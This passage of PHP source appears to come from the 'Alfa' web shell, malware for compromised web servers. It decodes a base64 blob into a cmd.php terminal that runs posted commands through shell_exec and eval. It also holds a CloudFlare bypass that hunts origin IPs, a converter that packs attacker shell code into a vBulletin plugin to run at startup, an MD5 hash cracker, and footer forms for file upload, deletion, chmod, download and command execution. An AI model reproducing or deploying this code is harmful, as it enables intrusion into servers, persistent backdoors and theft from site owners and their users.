mIChzdWJzdHIoJHRoZWNtZCwgMCwgNSk9PSI8cGhwPiIpDQogew0KICBldmFsKCckcmVzdWx0ID0gJy5zdWJzdHIoJHRoZWNtZCwgNikuJzsnKTsNCiB9DQogZWxzZQ0KICRyZXN1bHQgPSBzaGVsbF9leGVjMigkX1BPU1RbJ2p4Y21kJ10uIiAyPiYxIiwgJF9QT1NUWydjd2QnXSk7DQogaWYgKHN1YnN0cigkcmVzdWx0LCBzdHJsZW4oJHJlc3VsdCktMSwgMSk9PSJcbiIpDQogew0KICAkcmVzdWx0ID0gc3Vic3RyKCRyZXN1bHQsIDAsIHN0cmxlbigkcmVzdWx0KS0xKTsNCiB9DQogZWNobygnZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS52YWx1ZSs9Jy5qc29uX2VuY29kZSgkcmVzdWx0KS4nKyJcbiI7bmV3Y21kKCk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS5zY3JvbGxUb3A9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS5zY3JvbGxIZWlnaHQ7Jyk7DQogZXhpdDsNCn0NCmVjaG8oJzxzdHlsZT5ib2R5IHtiYWNrZ3JvdW5kLWNvbG9yOiBibGFjazsgY29sb3I6IHdoaXRlOyBmb250LXNpemU6IDEycHg7fTwvc3R5bGU+PHNjcmlwdD4nKTsgPz4NCndpbmRvdy5vbmxvYWQgPSBzZXR0aGVzaXplOw0Kd2luZG93Lm9ucmVzaXplID0gc2V0dGhlc2l6ZTsNCndpbmRvdy51cGRpciA9IDA7DQp3aW5kb3cuY29tbWFuZHMgPSBuZXcgQXJyYXkoKTsNCndpbmRvdy5sb2dnZWR1c2VyID0gIjw/cGhwDQokY21kID0gc2hlbGxfZXhlYzIoIndob2FtaSIsIE5VTEwpOw0KaWYgKHN0cnBvcygkY21kLCAibm90IGZvdW5kIik9PT1GQUxTRSkNCnsNCiBlY2hvKHN1YnN0cigkY21kLCAwLCBzdHJsZW4oJGNtZCktMSkpOyANCn0NCj8+IjsNCndpbmRvdy5jd2QgPSAiPD9waHANCiRjbWQgPSBzaGVsbF9leGVjMigicHdkIiwgTlVMTCk7DQppZiAoc3RycG9zKCRjbWQsICJub3QgZm91bmQiKT09PUZBTFNFKQ0Kew0KIGVjaG8oc3Vic3RyKCRjbWQsIDAsIHN0cmxlbigkY21kKS0xKSk7IA0KfQ0KPz4iOw0Kd2luZG93LmhvbWVjd2QgPSAiPD9waHANCiRjbWQgPSBzaGVsbF9leGVjMigicHdkIiwgTlVMTCk7DQppZiAoc3RycG9zKCRjbWQsICJub3QgZm91bmQiKT09PUZBTFNFKQ0Kew0KIGVjaG8oc3Vic3RyKCRjbWQsIDAsIHN0cmxlbigkY21kKS0xKSk7IA0KfQ0KPz4iOw0KZnVuY3Rpb24gc2V0dGhlc2l6ZSgpDQp7DQogZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS5zdHlsZS5oZWlnaHQ9KHdpbmRvdy5pbm5lckhlaWdodC0yMCkrInB4IjsNCiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnN0eWxlLndpZHRoPSh3aW5kb3cuaW5uZXJXaWR0aC0yMCkrInB4IjsNCiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnNlbGVjdGlvblN0YXJ0PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUubGVuZ3RoOw0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuc2VsZWN0aW9uRW5kPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUubGVuZ3RoOw0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuZm9jdXMoKTsNCn0NCmZ1bmN0aW9uIGFwcGVuZGRpcmVjdG9yeShzdHIpDQp7DQogaWYgKHN0ci5zdWJzdHIoMCwgMSk9PSIvIikNCiB3aW5kb3cuY3dkID0gc3RyOw0KIGVsc2UNCiB7DQogIHZhciBjID0gd2luZG93LmN3ZCsiLyIrc3RyOw0KICB2YXIgcmVhbCA9IG5ldyBBcnJheSgpOw0KICBjID0gYy5zcGxpdCgiLyIpOyB2YXIgaTsNCiAgZm9yKGk9MDtpPGMubGVuZ3RoO2krKykNCiAgew0KICAgaWYgKChjW2ldID09ICIuLiIpICYmIHJlYWwubGVuZ3RoPjApDQogICB7DQogICAgcmVhbC5zcGxpY2UocmVhbC5sZW5ndGgtMSwgMSk7DQogICB9DQogICBlbHNlIGlmICgoY1tpXSAhPSAiLiIpICYmIChjW2ldICE9ICIiKSkNCiAgIHJlYWwucHVzaChjW2ldKTsNCiAgfQ0KICB3aW5kb3cuY3dkID0gIi8iK3JlYWwuam9pbigiLyIpOw0KIH0NCn0NCmZ1bmN0aW9uIHdyaXRlbGFzdGxpbmUoc3RyKQ0Kew0KIHZhciBjYWxsID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS52YWx1ZS5zcGxpdCgiXG4iKSwgaTsNCiBjYWxsW2NhbGwubGVuZ3RoLTFdID0gc3RyOw0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUgPSBjYWxsLmpvaW4oIlxuIik7DQp9DQpmdW5jdGlvbiBjbWR1cChlKQ0Kew0KIGlmICh3aW5kb3cuY29tbWFuZHMubGVuZ3RoPih3aW5kb3cudXBkaXIpKQ0KIHsNCiAgd2luZG93LnVwZGlyKys7DQogIHdyaXRlbGFzdGxpbmUoIiIpOw0KICBuZXdjbWQoKTsNCiAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS52YWx1ZSArPSB3aW5kb3cuY29tbWFuZHNbd2luZG93LmNvbW1hbmRzLmxlbmd0aC13aW5kb3cudXBkaXJdOw0KIH0NCiBpZiAoZS5zdG9wUHJvcGFnYXRpb24pDQogew0KICBlLnN0b3BQcm9wYWdhdGlvbigpOw0KICBlLnByZXZlbnREZWZhdWx0KCk7DQogfQ0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuc2Nyb2xsVG9wPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuc2Nyb2xsSGVpZ2h0Ow0KfQ0KZnVuY3Rpb24gY21kb3duKGUpDQp7DQogaWYgKHdpbmRvdy51cGRpcj4xKQ0KIHsNCiAgd2luZG93LnVwZGlyLS07DQogIHdyaXRlbGFzdGxpbmUoIiIpOw0KICBuZXdjbWQoKTsNCiAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS52YWx1ZSArPSB3aW5kb3cuY29tbWFuZHNbd2luZG93LmNvbW1hbmRzLmxlbmd0aC13aW5kb3cudXBkaXJdOw0KIH0NCiBpZiAoZS5zdG9wUHJvcGFnYXRpb24pDQogew0KICBlLnN0b3BQcm9wYWdhdGlvbigpOw0KICBlLnByZXZlbnREZWZhdWx0KCk7DQogfQ0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuc2Nyb2xsVG9wPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikuc2Nyb2xsSGVpZ2h0Ow0KfQ0KZnVuY3Rpb24gcG9zdEFzeW5jaHJvbm91c0FqYXgodXJsLCB2YWx1ZXMpDQp7DQogdmFyIHhtbGh0dHA7DQogaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkNCiB7DQogIHhtbGh0dHA9bmV3IFhNTEh0dHBSZXF1ZXN0KCkNCiAgeG1saHR0cC5vcGVuKCJQT1NUIix1cmwsdHJ1ZSk7DQogIHhtbGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOw0KICB4bWxodHRwLnNlbmQodmFsdWVzKTsNCiAgeG1saHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KICB7DQogICBpZiAoeG1saHR0cC5yZWFkeVN0YXRlPT00KQ0KICAgew0KICAgIGlmICh4bWxodHRwLnN0YXR1cz09MjAwKQ0KICAgIHsNCiAgICAgZXZhbCh4bWxodHRwLnJlc3BvbnNlVGV4dCk7DQogICAgfQ0KICAgfQ0KICB9DQogfQ0KIGVsc2UgaWYgKHdpbmRvdy5BY3RpdmVYT2JqZWN0KQ0KIHsNCiAgeG1saHR0cD1uZXcgQWN0aXZlWE9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0KICBpZiAoeG1saHR0cCkNCiAgew0KICAgeG1saHR0cC5vcGVuKCJQT1NUIix1cmwsdHJ1ZSk7DQogICB4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCiAgIHhtbGh0dHAuc2VuZCh2YWx1ZXMpOw0KICAgeG1saHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KICAgew0KICAgIGlmICh4bWxodHRwLnJlYWR5U3RhdGU9PTQpDQogICAgew0KICAgICBpZiAoeG1saHR0cC5zdGF0dXM9PTIwMCkNCiAgICAgew0KICAgICAgZXZhbCh4bWxodHRwLnJlc3BvbnNlVGV4dCk7DQogICAgIH0NCiAgICB9DQogICB9DQogIH0NCiB9DQp9DQpmdW5jdGlvbiB1cmxlbmNvZGUgKHN0cikNCnsNCiByZXR1cm4gZW5jb2RlVVJJQ29tcG9uZW50KHN0cikucmVwbGFjZSgvIS9nLCAnJTIxJykucmVwbGFjZSgvJy9nLCAnJTI3JykucmVwbGFjZSgvXCgvZywgJyUyOCcpLg0KIHJlcGxhY2UoL1wpL2csICclMjknKS5yZXBsYWNlKC9cKi9nLCAnJTJBJykucmVwbGFjZSgvJTIwL2csICcrJyk7DQp9DQpmdW5jdGlvbiBuZXdjbWQoKQ0Kew0KIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUgKz0gIlsiK3dpbmRvdy5sb2dnZWR1c2VyKyJAPD9waHAgZWNobygkX1NFUlZFUlsnSFRUUF9IT1NUJ10pOyA/PiAiKygod2luZG93LmN3ZD09Ii8iKT8oIi8iKTood2luZG93LmN3ZC5zcGxpdCgiLyIpW3dpbmRvdy5jd2Quc3BsaXQoIi8iKS5sZW5ndGgtMV0pKSsiXSMgIjsNCiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnNjcm9sbFRvcD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnNjcm9sbEhlaWdodDsNCn0NCmZ1bmN0aW9uIGV4ZWMoZSkNCnsNCiB3aW5kb3cudXBkaXI9MDsNCiB2YXIgYWxsID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNvbW1hbmQiKS52YWx1ZS5zcGxpdCgiXG4iKTsNCiBpZiAoYWxsW2FsbC5sZW5ndGgtMV0uc3Vic3RyKGFsbFthbGwubGVuZ3RoLTFdLmluZGV4T2YoIiMiKSkuc3Vic3RyKDIpPT0iY2xlYXIiKQ0KIHsNCiAgd2luZG93LmNvbW1hbmRzID0gbmV3IEFycmF5KCk7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWU9IiI7DQogIG5ld2NtZCgpOw0KICBlLnByZXZlbnREZWZhdWx0KCk7DQogfQ0KIGVsc2UgaWYgKGFsbFthbGwubGVuZ3RoLTFdLnN1YnN0cihhbGxbYWxsLmxlbmd0aC0xXS5pbmRleE9mKCIjIikpLnN1YnN0cigyLCAyKT09ImNkIikNCiB7DQogIGUucHJldmVudERlZmF1bHQoKTsNCiAgd2luZG93LmNvbW1hbmRzLnB1c2goYWxsW2FsbC5sZW5ndGgtMV0uc3Vic3RyKGFsbFthbGwubGVuZ3RoLTFdLmluZGV4T2YoIiMiKSkuc3Vic3RyKDIpKTsNCiAgaWYgKGFsbFthbGwubGVuZ3RoLTFdLnN1YnN0cihhbGxbYWxsLmxlbmd0aC0xXS5pbmRleE9mKCIjIikpLnN1YnN0cig1KT09In4iKQ0KICB7DQogICB3aW5kb3cuY3dkID0gd2luZG93LmhvbWVjd2Q7DQogICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnZhbHVlICs9ICJcbiI7ICBuZXdjbWQoKTsNCiAgfQ0KICBlbHNlDQogIHsNCiAgIGFwcGVuZGRpcmVjdG9yeShhbGxbYWxsLmxlbmd0aC0xXS5zdWJzdHIoYWxsW2FsbC5sZW5ndGgtMV0uaW5kZXhPZigiIyIpKS5zdWJzdHIoNSkpOw0KICAgcG9zdEFzeW5jaHJvbm91c0FqYXgoIjw/cGhwIGVjaG8oJHRmKTsgPz4iLCAidmVyaWZ5PSIrdXJsZW5jb2RlKHdpbmRvdy5jd2QpKTsNCiAgfQ0KIH0NCiBlbHNlDQogew0KICBlLnByZXZlbnREZWZhdWx0KCk7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUgKz0gIlxuIjsNCiAgd2luZG93LmNvbW1hbmRzLnB1c2goYWxsW2FsbC5sZW5ndGgtMV0uc3Vic3RyKGFsbFthbGwubGVuZ3RoLTFdLmluZGV4T2YoIiMiKSkuc3Vic3RyKDIpKTsNCiAgcG9zdEFzeW5jaHJvbm91c0FqYXgoIjw/cGhwIGVjaG8oJHRmKTsgPz4iLCAianhjbWQ9Iit1cmxlbmNvZGUoYWxsW2FsbC5sZW5ndGgtMV0uc3Vic3RyKGFsbFthbGwubGVuZ3RoLTFdLmluZGV4T2YoIiMiKSkuc3Vic3RyKDIpKSsiJmN3ZD0iK3dpbmRvdy5jd2QpOw0KIH0NCiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnNjcm9sbFRvcD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnNjcm9sbEhlaWdodDsNCn0NCmZ1bmN0aW9uIGJzcChlKQ0Kew0KIHZhciBhbGwgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY29tbWFuZCIpLnZhbHVlLnNwbGl0KCJcbiIpOw0KIGlmIChhbGxbYWxsLmxlbmd0aC0xXS5sZW5ndGg9PShhbGxbYWxsLmxlbmd0aC0xXS5pbmRleE9mKCIjIikrMikpDQogZS5wcmV2ZW50RGVmYXVsdCgpOw0KfQ0KPD9waHAgZWNobygnZnVuY3Rpb24gcGFyc2VrZXkoZSwgdGhzKXtpZiAoZS5rZXlDb2RlPT0xMyl7ZXhlYyhlKTt9ZWxzZSBpZihlLmtleUNvZGU9PTM4KXtjbWR1cChlKTtyZXR1cm4gZmFsc2U7fWVsc2UgaWYoZS5rZXlDb2RlPT00MCl7Y21kb3duKGUpO3JldHVybiBmYWxzZTt9ZWxzZSBpZihlLmtleUNvZGU9PTgpe2JzcChlKTt9fTwvc2NyaXB0Pjx0ZXh0YXJlYSByb3dzPTcgY29scz0xMzAgaWQ9ImNvbW1hbmQiIG9ua2V5cHJlc3M9InBhcnNla2V5KGV2ZW50LCB0aGlzKTsiPjwvdGV4dGFyZWE+PGJyPicpOz8+DQo8c2NyaXB0Pg0KbmV3Y21kKCk7DQo8L3NjcmlwdD4NCg==';
771. $decode = base64_decode($code);
772. $sole = fopen('cmd.php','w+');
773. $sole2 = fwrite ($sole ,$decode);
774. fclose($sole);
775. echo '<iframe src=cmd.php width=100% height=600px frameborder=0></iframe> ';
776. echo '</div>';
777. alfafooter();
778. }
779. function alfacloudflare(){
780. alfahead();
781. echo"<script>alfa1_=alfa2_=\"\"</script>
782. <div class=header><center>
783. <b><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">Cloud </font> <font color=\"#FFFFFF\">Flare</font> <font color=\"#FF0000\">ByPasser</font><font color=\"#FFFF01\"> ==</font></b>
784. <form action='' onsubmit=\"g('cloudflare',null,this.url.value,this.go.value); return false;\" method='post'>
785. <p><br><input type='text' size=30 name='url' placeholder=\"site.com\"><br/><br/>
786. <input type='submit' name='go' value='>>' />
787. </p>
788. </form></center>";
789. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
790. function is_ipv4($ip)
791. {
792. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
793. }
794. function getipCloudFlare($url){
795. $url = "http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi";
796. $login_data = "cfS=$url";
797. $login = curl_init();
798. curl_setopt($login, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0');
799. curl_setopt($login, CURLOPT_TIMEOUT, 40);
800. curl_setopt($login, CURLOPT_RETURNTRANSFER, 1);
801. curl_setopt($login, CURLOPT_URL, $url);
802. curl_setopt($login, CURLOPT_HEADER, 1);
803. curl_setopt($login, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
804. curl_setopt($login, CURLOPT_FOLLOWLOCATION, 1);
805. curl_setopt($login, CURLOPT_POST, 1);
806. curl_setopt($login, CURLOPT_POSTFIELDS, $login_data);
807. $content= curl_exec($login);
808. if (preg_match("/<UL><LI>(.*?)<\/UL>/",$content,$find)){
809. // if (preg_match("/<UL><LI>(.*?): $url (.*?) (.*?)<\/UL>/s",$content,$find)){
810. return $find[1];
811. }
812. else {
813. return 'Error';
814. }
815. curl_close($login);
816. }
817. $me = $argv[0];
818. $url = $_POST['alfa1'];
819. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
820. $url = preg_replace('/^(https?):\/\//', '', $url);
821. $url = "http://www.".$url;
822. }
823. $headers = get_headers($url, 1);
824. $server = $headers['Server'];
825. $subs = array('cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
826. $count = count($subs);
827. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches))
828. {
829. if($matches[2] != 'www')
830. {
831. $url = preg_replace('/^(https?):\/\//', '', $url);
832. }
833. else
834. {
835. $url = explode($matches[0], $url);
836. $url = $url[1];
837. }
838. }
839. if(is_array($server))
840. $server = $server[0];
841. echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/>';
842. if(preg_match('/cloudflare/i', $server))
843. echo "\n[+] CloudFlare detected: {$server}\n<br>";
844. else
845. echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
846. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
847. echo "[+] Searching for more IP addresses.\n\n<br><br>";
848. for($x = 0; $x < $count; $x++)
849. {
850. $site = $subs[$x] . $url;
851. $ip = is_ipv4(gethostbyname($site));
852. if($ip == '(Null)')
853. continue;
854. echo "Trying {$site}: {$ip}\n<br>";
855. }
856. // echo getipCloudFlare($url)."<br>";
857. echo "\n[+] Finished.\n<br>";
858. }
859. echo '</div>';
860. alfafooter();
861. }
862. function alfaphp2xml(){
863. alfahead();
864. echo"<script>alfa1_=alfa2_=\"\"</script>
865. <div class=header><center>
866. <b><b><br><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">Shell</font> <font color=\"#FFFFFF\">For</font> <font color=\"#FF0000\">vBulletin</font><font color=\"#FFFF01\"> ==</font></b>
867. <form action='' onsubmit=\"g('php2xml',null,this.code.value,this.go.value); return false;\" method='post'>
868. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
869. <input type='submit' name='go' value='Convert' />&nbsp;&nbsp;<input type='reset' value='Clear' name='B2'><br/><br/>
870. </p>
871. </form></center>";
872. if($_POST['alfa2'] && $_POST['alfa2'] == 'Convert' ) {
873. if ( get_magic_quotes_gpc() ){
874. $code=stripslashes($_POST['alfa1']);
875. }
876. else{
877. $code=$_POST['alfa1'];
878. }
879. $code = 'base64_decode('.$code.')';
880. $sole = 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pg0KDQo8cGx1Z2lucz4NCgk8cGx1Z2luIGFjdGl2ZT0iMSIgcHJvZHVjdD0idmJ1bGxldGluIj4NCgkJPHRpdGxlPnZCdWxsZXRpbjwvdGl0bGU+DQoJCTxob29rbmFtZT5pbml0X3N0YXJ0dXA8L2hvb2tuYW1lPg0KCQk8cGhwY29kZT48IVtDREFUQVtpZiAoc3RycG9zKCRfU0VSVkVSWydQSFBfU0VMRiddLCJzdWJzY3JpcHRpb25zLnBocCIpKSB7';
881. $invis = 'ZXhpdDsNCn1dXT48L3BocGNvZGU+DQoJPC9wbHVnaW4+DQo8L3BsdWdpbnM+';
882. echo"<pre id=\"strOutput\" style=\"margin-top:8px\" class=\"ml1\"><br/><center><textarea rows='10' name='users' cols='80' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>";
883. echo base64_decode("$sole").'base64_decode(\''.base64_encode($code).'\');'.base64_decode("$invis");
884. echo '</textarea></center><br>';
885. }
886. echo '</center></div>';
887. alfafooter();
888. }
889. function alfacpcrack()
890. {
891. alfahead();
892. echo '<div class=header>';
893. function cracker($pass){
894. $url = "http://md5online.org";
895. $login_data = "md5=$pass&search=0&action=decrypt&a=63443026";
896. $login = curl_init();
897. curl_setopt($login, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0');
898. curl_setopt($login, CURLOPT_TIMEOUT, 40);
899. curl_setopt($login, CURLOPT_RETURNTRANSFER, 1);
900. curl_setopt($login, CURLOPT_URL, $url);
901. curl_setopt($login, CURLOPT_HEADER, 1);
902. curl_setopt($login, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
903. curl_setopt($login, CURLOPT_FOLLOWLOCATION, 1);
904. curl_setopt($login, CURLOPT_POST, 1);
905. curl_setopt($login, CURLOPT_POSTFIELDS, $login_data);
906. $content= curl_exec($login);
907. if (preg_match("/<span style='color:limegreen'>Found : <b>(.*?)<\/b><\/span>/s",$content,$find)){
908. return '<table border="1"><td>'.'<font color=white></font>'.' <font color=white>Found : </font><b><font color=lightgreen>'.$find[1].'</font></b></td></table><br>';
909. }
910. else {
911. return '<table border="1"><td>'.'<font color=white>[+]</font>'.' <font color=white>No result found -></font> '.'<b><font color=red>'.$pass .'</font></b></td></table><br>';
912. }
913. curl_close($login);
914. }
915. echo '<center><script>alfa6_=alfa7_=alfa9_=\"\"</script>
916. <form onsubmit="g(\'cpcrack\',null,this.md5.value,this.go.value); return false;" method="post" action="" />
917. <input type="text" placeholder="Hash" name="md5" size="40" id="text" />
918. <input type="submit" value=">>" name="go" />
919. </form></center>
920. ';
921. if($_POST['alfa2'] == '>>'){
922. $hash = $_POST['alfa1'];
923. $res = cracker($hash);
924. echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/><center>'.$res.'</center>';
925. }
926. echo '</div>';
927. alfafooter();
928. }
929. function alfafooter()
930. {
931. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
932. <tr>
933. <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span><font color=#27979B>Make File : </font></span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
934. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span><font color=#27979B>Make Dir : </font></span><br><input class='dir' type=text name=d value=''><input type=submit value='>>'></form></td>
935. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);return false;\"><span><font color=#27979B>Delete : </font></span><br><input class='dir' type=text name=del value=''><input type=submit value='>>'></form></td>
936. <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return false;\"><span><font color=#27979B>Chmod : </font></span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
937. </tr>
938. <tr>
939. <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir : </font></span><br><input class='foottable' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
940. <td colspan='2'><form method='post' ><span><font color=#27979B>Http Download : </font></span><br><input class='foottable' type=text name=rtdown value=''><input type=submit value='>>'></form></td>
941. </tr>
942. <tr>
943. <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return false;\"><span><font color=#27979B>Execute : </font></span><br><input class='foottable' type=text name=c value=''><input type=submit value='>>'></form></td>
944. </tr>
945. <tr>
946. <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
947. <input type=hidden name=a value='FilesMAn'>
948. <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
949. <input type=hidden name=alfa1 value='uploadFile'>
950. <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
951. <span><font color=#27979B>Upload file:</font></span><br><input class='toolsInp' type=file name=f><br /><input type=submit value='>>'></form></td>
952. </tr>
953. </table>
954. </div>
955. </body>
956. </html>
957. ";
958. }
959. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
960. function posix_getpwuid($p) {return false;} }
961. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
962. function posix_getgrgid($p) {return false;} }
963. function alfaWhich($p) {
964. $path = alfaEx('which ' . $p);
965. if(!empty($path))
966. return $path;
967. return false;
968. }
969. function alfaSize($s) {
970. if($s >= 1073741824)
971. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
972. elseif($s >= 1048576)
973. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
974. elseif($s >= 1024)
975. return sprintf('%1.2f', $s / 1024 ) . ' KB';
976. else
977. return $s . ' B';
978. }
979. function alfaPerms($p) {
980. if (($p & 0xC000) == 0xC000)$i = 's';
981. elseif (($p & 0xA000) == 0xA000)$i = 'l';
982. elseif (($p & 0x8000) == 0x8000)$i = '-';
983. elseif (($p & 0x6000) == 0x6000)$i = 'b';
984. elseif (($p & 0x4000) == 0x4000)$i = 'd';
985. elseif (($p & 0x2000) == 0x2000)$i = 'c';
986. elseif (($p & 0x1000) == 0x1000)$i = 'p';
987. else $i = 'u';
988. $i .= (($p & 0x0100) ? 'r' : '-');
989. $i .= (($p & 0x0080) ? 'w' : '-');
990. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
991. $i .= (($p & 0x0020) ? 'r' : '-');
992. $i .= (($p & 0x0010) ? 'w' : '-');
993. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
994. $i .= (($p & 0x0004) ? 'r' : '-');
995. $i .= (($p & 0x0002) ? 'w' : '-');
996. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
997. return $i;
998. }
999. function alfaPermsColor($f) {
1000. if (!@is_readable($f))
1001. return '<font color=#FF0000>' . alfaPerms(@fileperms($f)) . '</font>';
1002. elseif (!@is_writable($f))
1003. return '<font color=white>' . alfaPerms(@fileperms($f)) . '</font>';
1004. else
1005. return '<font color=#25ff00>' . alfaPerms(@fileperms($f)) . '</font>';
1006. }
1007. if(!function_exists("scandir")) {
1008. function scandir($dir) {
1009. $dh = opendir($dir);
1010. while (false !== ($filename = readdir($dh)))
1011. $files[] = $filename;
1012. return $files;
1013. }
1014. }
1015. function alfaFilesMan() {
1016. alfahead();
1017. echo '<div class=header><script>alfa1_=alfa2_=alfa3_="";</script>';
1018. if(!empty($_POST['alfa1'])) {
1019. switch($_POST['alfa1']) {
1020. case 'uploadFile':
1021. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
1022. echo "<b><font color=\"#FFFFFF\">Can't upload file<b></font>";
1023. break;
1024. case 'mkdir':
1025. if(!@mkdir($_POST['alfa2']))
1026. echo "<b><font color=\"#FFFFFF\">Can't create new dir<b></font>";
1027. break;
1028. case 'delete':
1029. function deleteDir($path) {
1030. $path = (substr($path,-1)=='/') ? $path:$path.'/';
1031. $dh = opendir($path);
1032. while ( ($item = readdir($dh) ) !== false) {
1033. $item = $path.$item;
1034. if ( (basename($item) == "..") || (basename($item) == ".") )
1035. continue;
1036. $type = filetype($item);
1037. if ($type == "dir")
1038. deleteDir($item);
1039. else
1040. @unlink($item);
1041. }
1042. closedir($dh);
1043. @rmdir($path);
1044. }
1045. if(is_dir(@$_POST['alfa2']))
1046. deleteDir(@$_POST['alfa2']);
1047. else
1048. @unlink(@$_POST['alfa2']);
1049. break;
1050. default:
1051. if(!empty($_POST['alfa1'])) {
1052. $_SESSION['act'] = @$_POST['alfa1'];
1053. $_SESSION['f'] = @$_POST['f'];
1054. foreach($_SESSION['f'] as $k => $f)
1055. $_SESSION['f'][$k] = urldecode($f);
1056. $_SESSION['c'] = @$_POST['c'];
1057. }
1058. break;
1059. }
1060. }
1061. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
